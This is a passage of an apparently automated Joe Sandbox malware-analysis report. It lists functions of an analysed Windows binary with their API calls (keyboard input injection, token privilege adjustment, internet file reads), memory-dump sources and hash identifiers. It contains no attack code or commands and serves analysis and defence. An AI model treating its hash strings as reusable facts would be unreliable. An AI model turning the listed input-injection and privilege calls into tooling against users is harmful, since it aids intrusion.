                          • Instruction ID: 49ca1bc140523b2323f15b87e344528d8c1d8063081756e0e2ac3420270938ec
                          • Opcode Fuzzy Hash: daf04da29afdc1c3640233404ae45a3ffe658ec8369ed41041f75ae5f883e65e
                          • Instruction Fuzzy Hash: 1B419E356043029FC708DF28C4D1AAAB7E5FF49324F5045ADE95ACB3A1DF31AA41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B44342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B4439C
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B443B8
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00B44425
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00B44483
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: fb4786ecebcdff48c2c645c166472e0a2b84f04e6fa6b17cdc0102f282121b0e
                          • Instruction ID: 46f5a0ebb23552d5cf61c2ad0a64c456bf821420b2ffb0a7f1b9f30e6294d440
                          • Opcode Fuzzy Hash: fb4786ecebcdff48c2c645c166472e0a2b84f04e6fa6b17cdc0102f282121b0e
                          • Instruction Fuzzy Hash: 914127B0A00248AAEF208B649849BFDBBF5EB55711F04019AF581933C1CF748FA5E766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetCursorPos.USER32(?), ref: 00B6EFE2
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B7F3C3,?,?,?,?,?), ref: 00B6EFF7
                          • GetCursorPos.USER32(?), ref: 00B6F041
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B7F3C3,?,?,?), ref: 00B6F077
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          • Opcode ID: f87fa8086a4ff8d6d3aacfe87d7900c65a355e368d0c46784dcd6bf809e06f9c
                          • Instruction ID: 4b5caf42d871c5308fd87d03b16ffa8e3f5907747db7e1c03fc425ded7234f3c
                          • Opcode Fuzzy Hash: f87fa8086a4ff8d6d3aacfe87d7900c65a355e368d0c46784dcd6bf809e06f9c
                          • Instruction Fuzzy Hash: 4E21F335500018EFCB258F98D899EFA7BF5FB4A710F0440A9F905972A2C7359D51DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B4221E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          • Opcode ID: 566871907c1c740cead93aba56dde20ede326943b20deaf1a9bc3d8fb6eba338
                          • Instruction ID: c65cd65e38db587715d2a7696fd4e0e82f87c94fb98cd3f3cb62fd36d9a21559
                          • Opcode Fuzzy Hash: 566871907c1c740cead93aba56dde20ede326943b20deaf1a9bc3d8fb6eba338
                          • Instruction Fuzzy Hash: 03322675A006059FCB28CF69C481A6AF7F1FF48320B55C4AEE49ADB3A1D770EA41DB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00B1AE5E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: b4dcf93524ccdba396161fe88e2e471bc6d6f84d13802920f5a90a464bcb8563
                          • Instruction ID: b0d7168bca7a330f543a3e7e99c2a301ce309c55053fc1832bddd9f204e4ef7c
                          • Opcode Fuzzy Hash: b4dcf93524ccdba396161fe88e2e471bc6d6f84d13802920f5a90a464bcb8563
                          • Instruction Fuzzy Hash: 21A18065006206BADB24AB685CC8DFF39DDEB46740FA045E9F416D2192C914FC81D2B7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00B555FD
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B55629
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          • Opcode ID: c3e633ed8615e55988a05cbbc71e5302bd3dbf2acf4b8748a474f8a045c4d6e3
                          • Instruction ID: e7bba74e0ec51f5389594e38dcce70a2aa789dfac012a916ccfba7a7a855dd34
                          • Opcode Fuzzy Hash: c3e633ed8615e55988a05cbbc71e5302bd3dbf2acf4b8748a474f8a045c4d6e3
                          • Instruction Fuzzy Hash: EA41E471500609BFEB209A90DC95FBFB7FDEB4072BF1040DAFA0566180EB709E499B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4EA95
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B4EAEF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B4EB3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: b8457a6db8af2fdfc507cd6aa5c5a124ccc1c8d5c54061c12950ab3089907415
                          • Instruction ID: 1ffbeeb58f891258b6e36cb7dae87c25de42534c3662c1f4a5d22fd36566a2b7
                          • Opcode Fuzzy Hash: b8457a6db8af2fdfc507cd6aa5c5a124ccc1c8d5c54061c12950ab3089907415
                          • Instruction Fuzzy Hash: 8E215E35A00208EFCB00EFA5D895AEEBBF4FF48310F148099E805A7391DB31D955CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3BEC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                          • GetLastError.KERNEL32 ref: 00B3BF49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          • Opcode ID: fe6880f4c036656841dbd36a1ec072b54d0cfa6d9c36664874e8aca84e3938e7
                          • Instruction ID: dcda723b3f472847f38de8623f493217c03bdd92aa3a2491a1436b2f2b880238
                          • Opcode Fuzzy Hash: fe6880f4c036656841dbd36a1ec072b54d0cfa6d9c36664874e8aca84e3938e7
                          • Instruction Fuzzy Hash: 5F118CB2514304AFD718AF64ECC6D6AB7FDEB44711B20856EF55AA7291DB70EC408B20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B470AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B470D8
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00B47115
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B4711E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: e0473da700a77a81da2a397ea642c148752a383c0733ec2397a714b60a2db2ad
                          • Instruction ID: e2f754bda108ada3bbad5a1e7144ffedc7e81a45644f52a18c7f199229abac24
                          • Opcode Fuzzy Hash: e0473da700a77a81da2a397ea642c148752a383c0733ec2397a714b60a2db2ad
                          • Instruction Fuzzy Hash: 4A118EB1940228BFE7109BA8DC49FAFBBECEB08714F004656B901F71A0D7B49E0487E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3BE31 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B3BE5A
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B3BE71
                          • FreeSid.ADVAPI32(?), ref: 00B3BE81
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: c53c5fb5bd67d2373be8635d3081cabbc1d4d46a1173224fd94928bfc7c5dd69
                          • Instruction ID: fcdc1ef86e285350229fd92d96746a8e5edc75c59879bddead819be6e4bb1286
                          • Opcode Fuzzy Hash: c53c5fb5bd67d2373be8635d3081cabbc1d4d46a1173224fd94928bfc7c5dd69
                          • Instruction Fuzzy Hash: 01F0FF76900309BBDB04DBE4DD99AEDBBB8EB08201F104469A602E3191E7705644DB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B06670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 5896fe276f23a90a619294d7f59f272e70c7dc824a108306da8ebaf2eac9ef7a
                          • Instruction ID: 06d69b23496a68f233a4c00a53470af7dce7ef6bbaa41676b65ea2923d6717ef
                          • Opcode Fuzzy Hash: 5896fe276f23a90a619294d7f59f272e70c7dc824a108306da8ebaf2eac9ef7a
                          • Instruction Fuzzy Hash: E8A23A75E00219CFDB24DF58C8806ADBBF1FF48314F2581AAE859AB3A0D774AD91DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • GetParent.USER32(?), ref: 00B7F4B5
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00B1ADDD,?,?,?,00000006,?), ref: 00B7F52F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          • Opcode ID: 99e63ceaf13060a81f3409fc2f2d066db9753cd07b3a4b5abd0cbf8684a42456
                          • Instruction ID: 86d4d863b75a68407f50fbe14f6d16b97e2038bbb03011b51dc53a5ccb62ac1c
                          • Opcode Fuzzy Hash: 99e63ceaf13060a81f3409fc2f2d066db9753cd07b3a4b5abd0cbf8684a42456
                          • Instruction Fuzzy Hash: 97217935204104AFDB259F28D888EEA3BE6EF0A360F5842E5F5395B2F2D7309E51E750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4FD71
                          • FindClose.KERNEL32(00000000), ref: 00B4FDA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: efddd660801fea88373aad7154c7a80a376b25c504701307f85ad1314109d166
                          • Instruction ID: 205f4619d8e1ef76e1396c9b23531bd6240e3144a77710b544596d35f43eccb8
                          • Opcode Fuzzy Hash: efddd660801fea88373aad7154c7a80a376b25c504701307f85ad1314109d166
                          • Instruction Fuzzy Hash: 5B118471A106019FD710EF29C889A6AB7E9FF94324F44855EF8A5D73A1DB34ED01CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B7F352,?,?,?), ref: 00B6F115
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00B6F0FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          • Opcode ID: 491ee65588c1c29c05fc78fb7d3218d4d83e681576a1a853f855477b29881487
                          • Instruction ID: 945689b9b6ca80a4fff43f566ae65ac2e89c1fedfaa222f06b0e82a7fb253ad6
                          • Opcode Fuzzy Hash: 491ee65588c1c29c05fc78fb7d3218d4d83e681576a1a853f855477b29881487
                          • Instruction Fuzzy Hash: CF01B531204204EBDB21DF18EC85FBA3BE6FB87364F1405A5F9156B2E1CB35A812DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00B6F47D
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B7F42E,?,?,?,?,?), ref: 00B6F4A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          • Opcode ID: e6d3df5f39c63a660b0e670a1039e844f1e4e6af5920400dba3b55849f1d28cb
                          • Instruction ID: ef06b0a0607922daa1fc05c7bf9ad5b267c5aa43f1fe666d9a998360cdd4674e
                          • Opcode Fuzzy Hash: e6d3df5f39c63a660b0e670a1039e844f1e4e6af5920400dba3b55849f1d28cb
                          • Instruction Fuzzy Hash: 5CF01772410118BFEB049F95DC099AE7BB8FF48351F14405AF902A21A0DBB5AA51EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B5C2E2,?,?,00000000,?), ref: 00B4D73F
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B5C2E2,?,?,00000000,?), ref: 00B4D751
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
